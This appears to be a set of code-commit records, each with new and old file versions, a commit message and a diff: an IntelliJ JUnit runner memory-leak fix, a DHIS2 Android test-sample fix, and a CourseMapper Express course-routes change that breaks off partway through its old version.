new TreeMap<String, List<String>>() : null; final PrintWriter writer = new PrintWriter(myTempFile, CharsetToolkit.UTF8); try { writer.println(packageName); final List<String> testNames = new ArrayList<String>(); for (final T element : elements) { final String name = nameFunction.fun(element); if (name == null) { LOG.error("invalid element " + element); return; } if (perModule != null && element instanceof PsiElement) { final Module module = ModuleUtilCore.findModuleForPsiElement((PsiElement)element); if (module != null) { final String moduleDir = PathMacroUtil.getModuleDir(module.getModuleFilePath()); List<String> list = perModule.get(moduleDir); if (list == null) { list = new ArrayList<String>(); perModule.put(moduleDir, list); } list.add(name); } } else { testNames.add(name); } } if (perModule != null) { for (List<String> perModuleClasses : perModule.values()) { Collections.sort(perModuleClasses); testNames.addAll(perModuleClasses); } } else { Collections.sort(testNames); //sort tests in FQN order } for (String testName : testNames) { writer.println(testName); } } finally { writer.close(); } if (perModule != null && perModule.size() > 1) { final PrintWriter wWriter = new PrintWriter(myWorkingDirsFile, CharsetToolkit.UTF8); try { wWriter.println(packageName); for (String workingDir : perModule.keySet()) { wWriter.println(workingDir); final List<String> classNames = perModule.get(workingDir); wWriter.println(classNames.size()); for (String className : classNames) { wWriter.println(className); } } } finally { wWriter.close(); } } } catch (IOException e) { LOG.error(e); } } public void clear() { myJavaParameters = null; } }
plugins/junit/src/com/intellij/execution/junit/TestObject.java
/* * Copyright 2000-2011 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.execution.junit; import com.intellij.ExtensionPoints; import com.intellij.execution.*; import com.intellij.execution.configurations.*; import com.intellij.execution.junit2.TestProxy; import com.intellij.execution.junit2.segments.DeferredActionsQueue; import com.intellij.execution.junit2.segments.DeferredActionsQueueImpl; import com.intellij.execution.junit2.segments.DispatchListener; import com.intellij.execution.junit2.segments.Extractor; import com.intellij.execution.junit2.ui.JUnitTreeConsoleView; import com.intellij.execution.junit2.ui.TestsPacketsReceiver; import com.intellij.execution.junit2.ui.actions.RerunFailedTestsAction; import com.intellij.execution.junit2.ui.model.CompletionEvent; import com.intellij.execution.junit2.ui.model.JUnitRunningModel; import com.intellij.execution.junit2.ui.model.RootTestInfo; import com.intellij.execution.junit2.ui.properties.JUnitConsoleProperties; import com.intellij.execution.process.ProcessAdapter; import com.intellij.execution.process.ProcessEvent; import com.intellij.execution.runners.ExecutionEnvironment; import com.intellij.execution.runners.ProgramRunner; import com.intellij.execution.testframework.*; import com.intellij.execution.testframework.sm.SMTestRunnerConnectionUtil; import com.intellij.execution.testframework.sm.runner.SMTRunnerConsoleProperties; import com.intellij.execution.testframework.sm.runner.ui.SMTRunnerConsoleView; import com.intellij.execution.testframework.ui.BaseTestsOutputConsoleView; import com.intellij.execution.ui.ConsoleView; import com.intellij.execution.ui.ConsoleViewContentType; import com.intellij.execution.util.JavaParametersUtil; import com.intellij.execution.util.ProgramParametersUtil; import com.intellij.openapi.Disposable; import com.intellij.openapi.diagnostic.Logger; import com.intellij.openapi.extensions.Extensions; import com.intellij.openapi.module.Module; import com.intellij.openapi.module.ModuleUtilCore; import com.intellij.openapi.project.Project; import com.intellij.openapi.projectRoots.JavaSdkType; import com.intellij.openapi.projectRoots.Sdk; import com.intellij.openapi.projectRoots.ex.JavaSdkUtil; import com.intellij.openapi.roots.ModuleRootManager; import com.intellij.openapi.roots.ProjectRootManager; import com.intellij.openapi.util.Comparing; import com.intellij.openapi.util.Disposer; import com.intellij.openapi.util.Getter; import com.intellij.openapi.util.Key; import com.intellij.openapi.util.io.FileUtil; import com.intellij.openapi.util.registry.Registry; import com.intellij.openapi.vfs.CharsetToolkit; import com.intellij.psi.PsiClass; import com.intellij.psi.PsiElement; import com.intellij.psi.PsiMethod; import com.intellij.psi.PsiPackage; import com.intellij.refactoring.listeners.RefactoringElementListener; import com.intellij.rt.execution.junit.IDEAJUnitListener; import com.intellij.rt.execution.junit.JUnitStarter; import com.intellij.util.Function; import com.intellij.util.PathUtil; 
import jetbrains.buildServer.messages.serviceMessages.ServiceMessageTypes; import org.jetbrains.annotations.NonNls; import org.jetbrains.annotations.NotNull; import org.jetbrains.jps.model.serialization.PathMacroUtil; import java.io.File; import java.io.IOException; import java.io.PrintWriter; import java.util.*; public abstract class TestObject implements JavaCommandLine { protected static final Logger LOG = Logger.getInstance("#com.intellij.execution.junit.TestObject"); private static final String MESSAGE = ExecutionBundle.message("configuration.not.speficied.message"); @NonNls private static final String JUNIT_TEST_FRAMEWORK_NAME = "JUnit"; protected JavaParameters myJavaParameters; private final Project myProject; protected final JUnitConfiguration myConfiguration; protected final ExecutionEnvironment myEnvironment; protected File myTempFile = null; protected File myWorkingDirsFile = null; public File myListenersFile; public static TestObject fromString(final String id, final Project project, final JUnitConfiguration configuration, ExecutionEnvironment environment) { if (JUnitConfiguration.TEST_METHOD.equals(id)) return new TestMethod(project, configuration, environment); if (JUnitConfiguration.TEST_CLASS.equals(id)) return new TestClass(project, configuration, environment); if (JUnitConfiguration.TEST_PACKAGE.equals(id)) return new TestPackage(project, configuration, environment); else if (JUnitConfiguration.TEST_DIRECTORY.equals(id)) { return new TestDirectory(project, configuration, environment); } if (JUnitConfiguration.TEST_PATTERN.equals(id)) { return new TestsPattern(project, configuration, environment); } return NOT_CONFIGURED; } public Module[] getModulesToCompile() { final SourceScope sourceScope = getSourceScope(); return sourceScope != null ? sourceScope.getModulesToCompile() : Module.EMPTY_ARRAY; } protected TestObject(final Project project, final JUnitConfiguration configuration, ExecutionEnvironment environment) { myProject = project; myConfiguration = configuration; myEnvironment = environment; } public abstract String suggestActionName(); public RunnerSettings getRunnerSettings() { return myEnvironment.getRunnerSettings(); } public abstract RefactoringElementListener getListener(PsiElement element, JUnitConfiguration configuration); public abstract boolean isConfiguredByElement(JUnitConfiguration configuration, PsiClass testClass, PsiMethod testMethod, PsiPackage testPackage); protected void configureModule(final JavaParameters parameters, final RunConfigurationModule configurationModule, final String mainClassName) throws CantRunException { int classPathType = JavaParametersUtil.getClasspathType(configurationModule, mainClassName, true); JavaParametersUtil.configureModule(configurationModule, parameters, classPathType, myConfiguration.isAlternativeJrePathEnabled() ? 
myConfiguration.getAlternativeJrePath() : null); } private static final TestObject NOT_CONFIGURED = new TestObject(null, null, null) { @Override public RefactoringElementListener getListener(final PsiElement element, final JUnitConfiguration configuration) { return null; } @Override public String suggestActionName() { throw new RuntimeException(String.valueOf(myConfiguration)); } @Override public boolean isConfiguredByElement(final JUnitConfiguration configuration, PsiClass testClass, PsiMethod testMethod, PsiPackage testPackage) { return false; } @Override public void checkConfiguration() throws RuntimeConfigurationException { throw new RuntimeConfigurationError(MESSAGE); } @Override public JavaParameters getJavaParameters() throws ExecutionException { throw new ExecutionException(MESSAGE); } @Override protected void initialize() throws ExecutionException { throw new ExecutionException(MESSAGE); } }; public void checkConfiguration() throws RuntimeConfigurationException{ JavaParametersUtil.checkAlternativeJRE(myConfiguration); ProgramParametersUtil.checkWorkingDirectoryExist(myConfiguration, myConfiguration.getProject(), myConfiguration.getConfigurationModule().getModule()); } public SourceScope getSourceScope() { return SourceScope.modulesWithDependencies(myConfiguration.getModules()); } protected void initialize() throws ExecutionException { JavaParametersUtil.configureConfiguration(myJavaParameters, myConfiguration); myJavaParameters.setMainClass(JUnitConfiguration.JUNIT_START_CLASS); final Module module = myConfiguration.getConfigurationModule().getModule(); if (myJavaParameters.getJdk() == null){ myJavaParameters.setJdk(module != null ? ModuleRootManager.getInstance(module).getSdk() : ProjectRootManager.getInstance(myProject).getProjectSdk()); } myJavaParameters.getClassPath().add(JavaSdkUtil.getIdeaRtJarPath()); myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(JUnitStarter.class)); if (Registry.is("junit_sm_runner", false)) { myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(ServiceMessageTypes.class)); } myJavaParameters.getProgramParametersList().add(JUnitStarter.IDE_VERSION + JUnitStarter.VERSION); for (RunConfigurationExtension ext : Extensions.getExtensions(RunConfigurationExtension.EP_NAME)) { ext.updateJavaParameters(myConfiguration, myJavaParameters, getRunnerSettings()); } final Object[] listeners = Extensions.getExtensions(IDEAJUnitListener.EP_NAME); final StringBuilder buf = new StringBuilder(); for (final Object listener : listeners) { boolean enabled = true; for (RunConfigurationExtension ext : Extensions.getExtensions(RunConfigurationExtension.EP_NAME)) { if (ext.isListenerDisabled(myConfiguration, listener, getRunnerSettings())) { enabled = false; break; } } if (enabled) { final Class classListener = listener.getClass(); buf.append(classListener.getName()).append("\n"); myJavaParameters.getClassPath().add(PathUtil.getJarPathForClass(classListener)); } } if (buf.length() > 0) { try { myListenersFile = FileUtil.createTempFile("junit_listeners_", ""); myListenersFile.deleteOnExit(); myJavaParameters.getProgramParametersList().add("@@" + myListenersFile.getPath()); FileUtil.writeToFile(myListenersFile, buf.toString().getBytes(CharsetToolkit.UTF8_CHARSET)); } catch (IOException e) { LOG.error(e); } } } @Override public JavaParameters getJavaParameters() throws ExecutionException { if (myJavaParameters == null) { myJavaParameters = new JavaParameters(); initialize(); final Module module = myConfiguration.getConfigurationModule().getModule(); 
final Object[] patchers = Extensions.getExtensions(ExtensionPoints.JUNIT_PATCHER); for (Object patcher : patchers) { ((JUnitPatcher)patcher).patchJavaParameters(module, myJavaParameters); } } return myJavaParameters; } @Override public ExecutionResult execute(final Executor executor, @NotNull final ProgramRunner runner) throws ExecutionException { final boolean smRunner = Registry.is("junit_sm_runner", false); if (smRunner) { myJavaParameters.getVMParametersList().add("-Didea.junit.sm_runner"); } final JUnitProcessHandler handler = createHandler(executor); final RunnerSettings runnerSettings = getRunnerSettings(); JavaRunConfigurationExtensionManager.getInstance().attachExtensionsToProcess(myConfiguration, handler, runnerSettings); if (smRunner) { return useSmRunner(executor, handler); } final TestProxy unboundOutputRoot = new TestProxy(new RootTestInfo()); final JUnitConsoleProperties consoleProperties = new JUnitConsoleProperties(myConfiguration, executor); final JUnitTreeConsoleView consoleView = new JUnitTreeConsoleView(consoleProperties, myEnvironment, unboundOutputRoot); consoleView.initUI(); consoleView.attachToProcess(handler); unboundOutputRoot.setPrinter(consoleView.getPrinter()); Disposer.register(consoleView, unboundOutputRoot); final TestsPacketsReceiver packetsReceiver = new TestsPacketsReceiver(consoleView, unboundOutputRoot) { @Override public synchronized void notifyStart(TestProxy root) { if (!isRunning()) return; super.notifyStart(root); unboundOutputRoot.addChild(root); if (myConfiguration.isSaveOutputToFile()) { unboundOutputRoot.setOutputFilePath(myConfiguration.getOutputFilePath()); } final JUnitRunningModel model = getModel(); if (model != null) { handler.getOut().setDispatchListener(model.getNotifier()); Disposer.register(model, new Disposable() { @Override public void dispose() { handler.getOut().setDispatchListener(DispatchListener.DEAF); } }); consoleView.attachToModel(model); } } }; final DeferredActionsQueue queue = new DeferredActionsQueueImpl(); handler.getOut().setPacketDispatcher(packetsReceiver, queue); handler.getErr().setPacketDispatcher(packetsReceiver, queue); handler.addProcessListener(new ProcessAdapter() { private boolean myStarted = false; @Override public void startNotified(ProcessEvent event) { myStarted = true; } @Override public void processTerminated(ProcessEvent event) { handler.removeProcessListener(this); if (myTempFile != null) { FileUtil.delete(myTempFile); } if (myListenersFile != null) { FileUtil.delete(myListenersFile); } final Runnable runnable = new Runnable() { @Override public void run() { unboundOutputRoot.flush(); packetsReceiver.checkTerminated(); final JUnitRunningModel model = packetsReceiver.getModel(); notifyByBalloon(model, myStarted, consoleProperties); } }; handler.getOut().addRequest(runnable, queue); } @Override public void onTextAvailable(final ProcessEvent event, final Key outputType) { final String text = event.getText(); final ConsoleViewContentType consoleViewType = ConsoleViewContentType.getConsoleViewType(outputType); final Printable printable = new Printable() { @Override public void printOn(final Printer printer) { printer.print(text, consoleViewType); } }; final Extractor extractor; if (consoleViewType == ConsoleViewContentType.ERROR_OUTPUT || consoleViewType == ConsoleViewContentType.SYSTEM_OUTPUT) { extractor = handler.getErr(); } else { extractor = handler.getOut(); } extractor.getEventsDispatcher().processOutput(printable); } }); final RerunFailedTestsAction rerunFailedTestsAction = new 
RerunFailedTestsAction(consoleView); rerunFailedTestsAction.init(consoleProperties, myEnvironment); rerunFailedTestsAction.setModelProvider(new Getter<TestFrameworkRunningModel>() { @Override public TestFrameworkRunningModel get() { return packetsReceiver.getModel(); } }); final DefaultExecutionResult result = new DefaultExecutionResult(consoleView, handler); result.setRestartActions(rerunFailedTestsAction); return result; } private ExecutionResult useSmRunner(Executor executor, JUnitProcessHandler handler) { TestConsoleProperties testConsoleProperties = new SMTRunnerConsoleProperties( new RuntimeConfigurationProducer.DelegatingRuntimeConfiguration<JUnitConfiguration>( (JUnitConfiguration)myEnvironment.getRunProfile()), JUNIT_TEST_FRAMEWORK_NAME, executor ); testConsoleProperties.setIfUndefined(TestConsoleProperties.HIDE_PASSED_TESTS, false); BaseTestsOutputConsoleView smtConsoleView = SMTestRunnerConnectionUtil.createConsoleWithCustomLocator( JUNIT_TEST_FRAMEWORK_NAME, testConsoleProperties, myEnvironment, null); Disposer.register(myProject, smtConsoleView); final ConsoleView consoleView = smtConsoleView; consoleView.attachToProcess(handler); final RerunFailedTestsAction rerunFailedTestsAction = new RerunFailedTestsAction(consoleView); rerunFailedTestsAction.init(testConsoleProperties, myEnvironment); rerunFailedTestsAction.setModelProvider(new Getter<TestFrameworkRunningModel>() { @Override public TestFrameworkRunningModel get() { return ((SMTRunnerConsoleView)consoleView).getResultsViewer(); } }); final DefaultExecutionResult result = new DefaultExecutionResult(consoleView, handler); result.setRestartActions(rerunFailedTestsAction); return result; } protected void notifyByBalloon(JUnitRunningModel model, boolean started, JUnitConsoleProperties consoleProperties) { String comment; if (model != null) { final CompletionEvent done = model.getProgress().getDone(); comment = done != null ? done.getComment() : null; } else { comment = null; } TestsUIUtil.notifyByBalloon(myProject, started, model != null ? 
model.getRoot() : null, consoleProperties, comment); } protected JUnitProcessHandler createHandler(Executor executor) throws ExecutionException { appendForkInfo(executor); return JUnitProcessHandler.runCommandLine(CommandLineBuilder.createFromJavaParameters(myJavaParameters, myProject, true)); } private boolean forkPerModule() { final String workingDirectory = myConfiguration.getWorkingDirectory(); return JUnitConfiguration.TEST_PACKAGE.equals(myConfiguration.getPersistentData().TEST_OBJECT) && myConfiguration.getPersistentData().getScope() != TestSearchScope.SINGLE_MODULE && ("$" + PathMacroUtil.MODULE_DIR_MACRO_NAME + "$").equals(workingDirectory); } private void appendForkInfo(Executor executor) throws ExecutionException { final String forkMode = myConfiguration.getForkMode(); if (Comparing.strEqual(forkMode, "none")) { final String workingDirectory = myConfiguration.getWorkingDirectory(); if (!JUnitConfiguration.TEST_PACKAGE.equals(myConfiguration.getPersistentData().TEST_OBJECT) || myConfiguration.getPersistentData().getScope() == TestSearchScope.SINGLE_MODULE || !("$" + PathMacroUtil.MODULE_DIR_MACRO_NAME + "$").equals(workingDirectory)) { return; } } if (getRunnerSettings() != null) { final String actionName = executor.getActionName(); throw new CantRunException(actionName + " is disabled in fork mode.<br/>Please change fork mode to &lt;none&gt; to " + actionName.toLowerCase() + "."); } final JavaParameters javaParameters = getJavaParameters(); final Sdk jdk = javaParameters.getJdk(); if (jdk == null) { throw new ExecutionException(ExecutionBundle.message("run.configuration.error.no.jdk.specified")); } try { final File tempFile = FileUtil.createTempFile("command.line", "", true); final PrintWriter writer = new PrintWriter(tempFile, CharsetToolkit.UTF8); try { writer.println(((JavaSdkType)jdk.getSdkType()).getVMExecutablePath(jdk)); for (String vmParameter : javaParameters.getVMParametersList().getList()) { writer.println(vmParameter); } writer.println("-classpath"); writer.println(javaParameters.getClassPath().getPathsString()); } finally { writer.close(); } myJavaParameters.getProgramParametersList().add("@@@" + forkMode + ',' + tempFile.getAbsolutePath()); } catch (Exception e) { LOG.error(e); } } protected <T> void addClassesListToJavaParameters(Collection<? extends T> elements, Function<T, String> nameFunction, String packageName, boolean createTempFile, boolean junit4) { try { if (createTempFile) { myTempFile = FileUtil.createTempFile("idea_junit", ".tmp"); myTempFile.deleteOnExit(); myJavaParameters.getProgramParametersList().add("@" + myTempFile.getAbsolutePath()); } final Map<String, List<String>> perModule = forkPerModule() ? 
new TreeMap<String, List<String>>() : null; final PrintWriter writer = new PrintWriter(myTempFile, CharsetToolkit.UTF8); try { writer.println(packageName); final List<String> testNames = new ArrayList<String>(); for (final T element : elements) { final String name = nameFunction.fun(element); if (name == null) { LOG.error("invalid element " + element); return; } if (perModule != null && element instanceof PsiElement) { final Module module = ModuleUtilCore.findModuleForPsiElement((PsiElement)element); if (module != null) { final String moduleDir = PathMacroUtil.getModuleDir(module.getModuleFilePath()); List<String> list = perModule.get(moduleDir); if (list == null) { list = new ArrayList<String>(); perModule.put(moduleDir, list); } list.add(name); } } else { testNames.add(name); } } if (perModule != null) { for (List<String> perModuleClasses : perModule.values()) { Collections.sort(perModuleClasses); testNames.addAll(perModuleClasses); } } else { Collections.sort(testNames); //sort tests in FQN order } for (String testName : testNames) { writer.println(testName); } } finally { writer.close(); } if (perModule != null && perModule.size() > 1) { final PrintWriter wWriter = new PrintWriter(myWorkingDirsFile, CharsetToolkit.UTF8); try { wWriter.println(packageName); for (String workingDir : perModule.keySet()) { wWriter.println(workingDir); final List<String> classNames = perModule.get(workingDir); wWriter.println(classNames.size()); for (String className : classNames) { wWriter.println(className); } } } finally { wWriter.close(); } } } catch (IOException e) { LOG.error(e); } } public void clear() { myJavaParameters = null; } }
tests mem leak
plugins/junit/src/com/intellij/execution/junit/TestObject.java
tests mem leak
<ide><path>lugins/junit/src/com/intellij/execution/junit/TestObject.java
<ide> }
<ide> };
<ide>
<add> Disposer.register(consoleView, packetsReceiver);
<ide> final DeferredActionsQueue queue = new DeferredActionsQueueImpl();
<ide> handler.getOut().setPacketDispatcher(packetsReceiver, queue);
<ide> handler.getErr().setPacketDispatcher(packetsReceiver, queue);
Java
bsd-3-clause
057b0ce09fa9f4795e5067b46f64cd0721661265
0
dhis2/dhis2-android-sdk,dhis2/dhis2-android-sdk,dhis2/dhis2-android-sdk
/*
 * Copyright (c) 2004-2019, University of Oslo
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions are met:
 * Redistributions of source code must retain the above copyright notice, this
 * list of conditions and the following disclaimer.
 *
 * Redistributions in binary form must reproduce the above copyright notice,
 * this list of conditions and the following disclaimer in the documentation
 * and/or other materials provided with the distribution.
 * Neither the name of the HISP project nor the names of its contributors may
 * be used to endorse or promote products derived from this software without
 * specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
 * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
 * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

package org.hisp.dhis.android.core.data.systeminfo;

import org.hisp.dhis.android.core.common.BaseIdentifiableObject;
import org.hisp.dhis.android.core.systeminfo.SystemInfo;

import java.text.ParseException;
import java.util.Date;

public class SystemInfoSamples {

    public static SystemInfo get1() {
        return SystemInfo.builder()
                .id(1L)
                .serverDate(getDate("2017-11-29T11:27:46.935"))
                .dateFormat("yyyy-mm-dd")
                .version("2.30")
                .contextPath("https://play.dhis2.org/android-current")
                .systemName("DHIS 2 Demo - Sierra Leone")
                .build();
    }

    public static SystemInfo get2() {
        return SystemInfo.builder()
                .id(1L)
                .serverDate(getDate("2018-04-29T11:27:46.935"))
                .dateFormat("yyyy-DD-mm")
                .version("2.29")
                .contextPath("https://play.dhis2.org/android-current")
                .systemName("DHIS 2 Demo - Sierra Leone")
                .build();
    }

    private static Date getDate(String dateStr) {
        try {
            return BaseIdentifiableObject.DATE_FORMAT.parse(dateStr);
        } catch (ParseException e) {
            e.printStackTrace();
            return null;
        }
    }
}
core/src/sharedTest/java/org/hisp/dhis/android/core/data/systeminfo/SystemInfoSamples.java
/*
 * Copyright (c) 2004-2019, University of Oslo
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions are met:
 * Redistributions of source code must retain the above copyright notice, this
 * list of conditions and the following disclaimer.
 *
 * Redistributions in binary form must reproduce the above copyright notice,
 * this list of conditions and the following disclaimer in the documentation
 * and/or other materials provided with the distribution.
 * Neither the name of the HISP project nor the names of its contributors may
 * be used to endorse or promote products derived from this software without
 * specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
 * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
 * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

package org.hisp.dhis.android.core.data.systeminfo;

import org.hisp.dhis.android.core.common.BaseIdentifiableObject;
import org.hisp.dhis.android.core.systeminfo.SystemInfo;

import java.text.ParseException;
import java.util.Date;

public class SystemInfoSamples {

    public static SystemInfo get1() {
        return SystemInfo.builder()
                .id(1L)
                .serverDate(getDate("2017-11-29T11:27:46.935"))
                .dateFormat("yyyy-mm-dd")
                .version("2.30")
                .contextPath("https://play.dhis2.org/android-current")
                .systemName("DHIS 2 Demo - Sierra Leone")
                .build();
    }

    public static SystemInfo get2() {
        return SystemInfo.builder()
                .serverDate(getDate("2018-04-29T11:27:46.935"))
                .dateFormat("yyyy-DD-mm")
                .version("2.29")
                .contextPath("https://play.dhis2.org/android-current")
                .systemName("DHIS 2 Demo - Sierra Leone")
                .build();
    }

    private static Date getDate(String dateStr) {
        try {
            return BaseIdentifiableObject.DATE_FORMAT.parse(dateStr);
        } catch (ParseException e) {
            e.printStackTrace();
            return null;
        }
    }
}
[ANDROSDK-752] Fix SystemInfo tests
core/src/sharedTest/java/org/hisp/dhis/android/core/data/systeminfo/SystemInfoSamples.java
[ANDROSDK-752] Fix SystemInfo tests
<ide><path>ore/src/sharedTest/java/org/hisp/dhis/android/core/data/systeminfo/SystemInfoSamples.java
<ide>
<ide> public static SystemInfo get2() {
<ide> return SystemInfo.builder()
<add> .id(1L)
<ide> .serverDate(getDate("2018-04-29T11:27:46.935"))
<ide> .dateFormat("yyyy-DD-mm")
<ide> .version("2.29")
JavaScript
mit
094348461b8d48e22cb2c66a1a015efbd13ab26f
0
CourseMapper/course-mapper,CourseMapper/course-mapper,CourseMapper/course-mapper
var express = require('express'); var config = require('config'); var appRoot = require('app-root-path'); var Course = require(appRoot + '/modules/catalogs/course.controller.js'); var Account = require(appRoot + '/modules/accounts'); var helper = require(appRoot + '/libs/core/generalLibs.js'); var debug = require('debug')('cm:route'); var moment = require('moment'); var multiparty = require('connect-multiparty'); var multipartyMiddleware = multiparty(); var router = express.Router(); var mongoose = require('mongoose'); /** * POST * create course */ router.post('/courses', function(req, res, next){ if (!req.user) { res.status(401).send('Unauthorized'); } else { var catalog = new Course(); req.body.userId = req.user._id; // format the tags data structure if(req.body.tags) { // because the data is in {text:the-tag} format. let's just get the values. var tagSlugs = []; var tTags = JSON.parse(req.body.tags); for (var i in tTags) { tagSlugs.push(tTags[i]['text']); } req.body.tagSlugs = tagSlugs; } catalog.addCourse( function (err) { res.status(200).json({result:false, errors: [err.message]}); }, // parameters req.body, function (course) { res.status(200).json({result:true, course: course}); } ); } }); /** * POST * update a course, * can take a picture file as well */ router.post('/course/:courseId', multipartyMiddleware, function(req, res, next){ if (!req.user) { return res.status(401).send('Unauthorized'); } var catalog = new Course(); req.body.userId = mongoose.Types.ObjectId(req.user._id); req.body.courseId = mongoose.Types.ObjectId(req.params.courseId); // format the tags data structure if(req.body.tags) { // because the data is in {text:the-tag} format. let's just get the values. var tagSlugs = []; var tTags = JSON.parse(req.body.tags); for (var i in tTags) { tagSlugs.push(tTags[i]['text']); } req.body.tagSlugs = tagSlugs; } catalog.editCourse( function (err) { helper.resReturn(err, res); }, // parameters req.body, req.files, function (course) { res.status(200).json({result:true, course: course}); } ); }); router.get('/courses', function(req, res, next) { var cat = new Course(); cat.getCourses( function(err){ helper.resReturn(err, res); }, { // parameters }, function(courses){ res.status(200).json({result: true, courses: courses}); } ); }); router.get('/course/:courseId', function(req, res, next) { if (!helper.checkRequiredParams(req.params, ['courseId'], function(err){ helper.resReturn(err, res); })) return; var cat = new Course(); cat.getCourse( function(err){ helper.resReturn(err, res); }, { _id: req.params.courseId }, function(course){ res.status(200).json({result:true, course: course}); } ); }); /** * PUT * enrolling user into a course */ router.put('/course/:courseId/enroll', function(req, res, next) { if (!req.user) return res.status(401).send('Unauthorized'); var catalog = new Course(); var uid = mongoose.Types.ObjectId(req.user._id); var courseId = mongoose.Types.ObjectId(req.params.courseId); catalog.enroll( function failed(err){ res.status(200).send({result:false, errors:err}); }, {id: uid}, {id: courseId}, function (followed) { res.status(200).json({result:true, enrollment: followed}); }, // isEnrolled -> true true); }); /** * PUT * */ router.put('/course/:courseId/leave', function(req, res, next) { if (!req.user) res.status(401).send('Unauthorized'); var uid = mongoose.Types.ObjectId(req.user._id); var courseId = mongoose.Types.ObjectId(req.params.courseId); var catalog = new Course(); catalog.leave( function failed(err){ res.status(200).send({result:false, errors:err}); }, 
{id: uid}, {id: courseId}, function () { res.status(200).json({result:true}); }); }); /** * PUT * add a username as a manager into a course */ router.put('/course/:courseId/addManager', function(req, res, next){ if (!req.user) { return res.status(401).send('Unauthorized'); } req.body.createdBy = mongoose.Types.ObjectId(req.user._id); req.body.courseId = mongoose.Types.ObjectId(req.params.courseId); var catalog = new Course(); // format the tags data structure if(req.body.managers) { // because the data is in {text:the-tag} format. let's just get the values. var managerSlugs = []; var tTags = JSON.parse(req.body.managers); for (var i in tTags) { managerSlugs.push(tTags[i]['text']); } req.body.managers = managerSlugs; } catalog.addManager( function (err) { helper.resReturn(err, res); }, // parameters req.body, function (course) { res.status(200).json({result:true, course: course}); } ); }); module.exports = router;
routes/api/courses.js
var express = require('express'); var config = require('config'); var appRoot = require('app-root-path'); var Course = require(appRoot + '/modules/catalogs/course.controller.js'); var Account = require(appRoot + '/modules/accounts'); var helper = require(appRoot + '/libs/core/generalLibs.js'); var debug = require('debug')('cm:route'); var moment = require('moment'); var multiparty = require('connect-multiparty'); var multipartyMiddleware = multiparty(); var router = express.Router(); /** * POST * create course */ router.post('/courses', function(req, res, next){ if (!req.user) { res.status(401).send('Unauthorized'); } else { var catalog = new Course(); req.body.userId = req.user._id; // format the tags data structure if(req.body.tags) { // because the data is in {text:the-tag} format. let's just get the values. var tagSlugs = []; var tTags = JSON.parse(req.body.tags); for (var i in tTags) { tagSlugs.push(tTags[i]['text']); } req.body.tagSlugs = tagSlugs; } catalog.addCourse( function (err) { res.status(200).json({result:false, errors: [err.message]}); }, // parameters req.body, function (course) { res.status(200).json({result:true, course: course}); } ); } }); /** * POST * update a course, * can take a picture file as well */ router.post('/course/:courseId', multipartyMiddleware, function(req, res, next){ if (!req.user) { return res.status(401).send('Unauthorized'); } var catalog = new Course(); req.body.userId = req.user._id; req.body.courseId = req.params.courseId; // format the tags data structure if(req.body.tags) { // because the data is in {text:the-tag} format. let's just get the values. var tagSlugs = []; var tTags = JSON.parse(req.body.tags); for (var i in tTags) { tagSlugs.push(tTags[i]['text']); } req.body.tagSlugs = tagSlugs; } catalog.editCourse( function (err) { helper.resReturn(err, res); }, // parameters req.body, req.files, function (course) { res.status(200).json({result:true, course: course}); } ); }); router.get('/courses', function(req, res, next) { var cat = new Course(); cat.getCourses( function(err){ helper.resReturn(err, res); }, { // parameters }, function(courses){ res.status(200).json({result: true, courses: courses}); } ); }); router.get('/course/:courseId', function(req, res, next) { if (!helper.checkRequiredParams(req.params, ['courseId'], function(err){ helper.resReturn(err, res); })) return; var cat = new Course(); cat.getCourse( function(err){ helper.resReturn(err, res); }, { _id: req.params.courseId }, function(course){ res.status(200).json({result:true, course: course}); } ); }); /** * PUT * enrolling user into a course */ router.put('/course/:courseId/enroll', function(req, res, next) { if (!req.user) return res.status(401).send('Unauthorized'); var catalog = new 